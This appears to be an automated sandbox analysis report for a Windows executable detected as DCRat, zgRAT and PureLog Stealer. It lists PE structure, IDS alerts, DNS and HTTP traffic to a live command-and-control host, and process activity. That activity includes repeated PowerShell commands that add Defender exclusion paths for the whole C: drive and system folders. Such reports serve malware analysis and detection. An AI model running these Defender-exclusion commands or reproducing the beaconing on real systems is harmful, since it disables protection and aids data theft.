                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2e0c0x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x320.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xe640x10000baf8508519d41cdff0b3d392bf7f161False0.550048828125data5.290703402026259IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x40000x3200x400574e65dbca3f3dca430748b98fa97b40False0.3505859375data2.6411336922484443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x60000xc0x200d6184c9d9515741c9c8f18c6f2a963c1False1.001953125data6.544351981538345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_VERSION0x40580x2c8data0.46207865168539325

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-11-30T04:28:03.264974+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449742172.66.0.10280TCP
                                                                  2024-11-30T04:28:28.374262+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449790172.66.0.10280TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 30, 2024 04:28:01.875127077 CET4974280192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:01.995042086 CET8049742172.66.0.102192.168.2.4
                                                                  Nov 30, 2024 04:28:01.995141983 CET4974280192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:01.996170998 CET4974280192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:02.116162062 CET8049742172.66.0.102192.168.2.4
                                                                  Nov 30, 2024 04:28:02.343935013 CET4974280192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:02.463824987 CET8049742172.66.0.102192.168.2.4
                                                                  Nov 30, 2024 04:28:03.126625061 CET8049742172.66.0.102192.168.2.4
                                                                  Nov 30, 2024 04:28:03.264974117 CET4974280192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:03.436305046 CET8049742172.66.0.102192.168.2.4
                                                                  Nov 30, 2024 04:28:03.561846972 CET4974280192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:03.725610018 CET4974280192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:26.870417118 CET4979080192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:26.990307093 CET8049790172.66.0.102192.168.2.4
                                                                  Nov 30, 2024 04:28:26.990370035 CET4979080192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:26.990590096 CET4979080192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:27.110498905 CET8049790172.66.0.102192.168.2.4
                                                                  Nov 30, 2024 04:28:27.343236923 CET4979080192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:27.463205099 CET8049790172.66.0.102192.168.2.4
                                                                  Nov 30, 2024 04:28:28.293169022 CET8049790172.66.0.102192.168.2.4
                                                                  Nov 30, 2024 04:28:28.374262094 CET4979080192.168.2.4172.66.0.102
                                                                  Nov 30, 2024 04:28:28.541955948 CET8049790172.66.0.102192.168.2.4
                                                                  Nov 30, 2024 04:28:28.551269054 CET4979080192.168.2.4172.66.0.102

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 30, 2024 04:28:01.421881914 CET5171553192.168.2.41.1.1.1
                                                                  Nov 30, 2024 04:28:01.868345976 CET53517151.1.1.1192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 30, 2024 04:28:01.421881914 CET192.168.2.41.1.1.10x527eStandard query (0)390412cm.n9shteam.inA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 30, 2024 04:28:01.868345976 CET1.1.1.1192.168.2.40x527eNo error (0)390412cm.n9shteam.in172.66.0.102A (IP address)IN (0x0001)false
                                                                  Nov 30, 2024 04:28:01.868345976 CET1.1.1.1192.168.2.40x527eNo error (0)390412cm.n9shteam.in172.66.0.158A (IP address)IN (0x0001)false
                                                                  Nov 30, 2024 04:28:01.868345976 CET1.1.1.1192.168.2.40x527eNo error (0)390412cm.n9shteam.in162.159.140.160A (IP address)IN (0x0001)false
                                                                  Nov 30, 2024 04:28:01.868345976 CET1.1.1.1192.168.2.40x527eNo error (0)390412cm.n9shteam.in162.159.140.104A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • 390412cm.n9shteam.in

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449742172.66.0.102803940C:\Program Files (x86)\Steam\steamclient.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 30, 2024 04:28:01.996170998 CET288OUTPOST /ProviderImagepipeTopacketbaseuniversaldle.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 390412cm.n9shteam.in
                                                                  Content-Length: 336
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Nov 30, 2024 04:28:02.343935013 CET336OUTData Raw: 00 0a 01 05 06 0f 01 04 05 06 02 01 02 05 01 02 00 04 05 08 02 04 03 0e 02 0e 0e 06 03 0e 01 54 0c 05 04 00 07 02 07 0a 0e 51 07 07 00 05 07 54 07 07 0f 00 0e 04 07 01 04 54 04 51 01 00 04 0a 05 0a 0c 0a 07 0f 01 00 0e 0e 0e 57 0d 02 0e 53 05 54
                                                                  Data Ascii: TQTTQWSTTWV\L}TkcvwLr_wup@lzX`B`M|spIoBslNz}}^tY{^}u~V@@{CvA~_y
                                                                  Nov 30, 2024 04:28:03.126625061 CET25INHTTP/1.1 100 Continue
                                                                  Nov 30, 2024 04:28:03.436305046 CET1028INHTTP/1.1 404 Not Found
                                                                  Date: Sat, 30 Nov 2024 03:28:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=svs1W%2F113TjHATkmrCi8eEf9mLPo62hK9HdjAhfSsTaOO2XkMID6wPW68O08UwaMT8eMZ564Hd%2BloNLIYTx3JUQU%2BpQxe%2Fj88ArZMKU5zFPtfDjmZjbqaw31LZZevmczEnkDPcnkNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ea7bec28e60c35d-EWR
                                                                  alt-svc: h2=":443"; ma=60
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7658&min_rtt=1455&rtt_var=12952&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=624&delivery_rate=28582&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449790172.66.0.102801516C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 30, 2024 04:28:26.990590096 CET300OUTPOST /ProviderImagepipeTopacketbaseuniversaldle.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                  Host: 390412cm.n9shteam.in
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Nov 30, 2024 04:28:27.343236923 CET344OUTData Raw: 00 04 01 05 03 0c 04 06 05 06 02 01 02 04 01 03 00 01 05 0d 02 06 03 09 03 00 0d 00 04 54 00 08 0d 52 07 0e 07 0d 04 0b 0e 51 05 0a 07 01 06 0f 06 06 0b 0d 0e 02 05 01 05 0e 04 02 07 02 04 58 05 05 0f 0b 07 51 04 04 0b 03 0c 52 0f 03 0f 01 05 53
                                                                  Data Ascii: TRQXQRSUXU\L}Pk^bOtLuLbe^O|U}vt|sZDl|UxN~knsTwhNje~V@@x}~}\u
                                                                  Nov 30, 2024 04:28:28.293169022 CET25INHTTP/1.1 100 Continue
                                                                  Nov 30, 2024 04:28:28.541955948 CET1026INHTTP/1.1 404 Not Found
                                                                  Date: Sat, 30 Nov 2024 03:28:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uw1eIJoYqm4R4zbg4HK0l8JwYdTl34kT4RzWnZxqHO3cuXVLi2cfhSJs%2Fu0cEaoSbkeEIoqxycsdJwpihcZ3OwvIFoD8Q3kOKWtdPFwqSwFovAJR9GB%2FVDKwigGeiP0h5AfN5BxVlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ea7bf5fdfb74331-EWR
                                                                  alt-svc: h2=":443"; ma=60
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=91093&min_rtt=56596&rtt_var=45864&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=644&delivery_rate=25796&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:22:26:55
                                                                  Start date:29/11/2024
                                                                  Path:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\qNdO4D18CF.exe"
                                                                  Imagebase:0x230000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.2019926937.000000001AE80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2019926937.000000001AE80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1880880239.0000000012703000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1880880239.0000000012703000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:22:26:59
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline"
                                                                  Imagebase:0x7ff74bbe0000
                                                                  File size:2'759'232 bytes
                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:22:26:59
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:22:26:59
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA90.tmp" "c:\Windows\System32\CSCA9DA535D810450AA35B2C9F27DA16D.TMP"
                                                                  Imagebase:0x7ff650040000
                                                                  File size:52'744 bytes
                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:22:26:59
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:22:26:59
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:22:26:59
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:7
                                                                  Start time:22:26:59
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:9
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:13
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:14
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:15
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:16
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:17
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:18
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:19
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:20
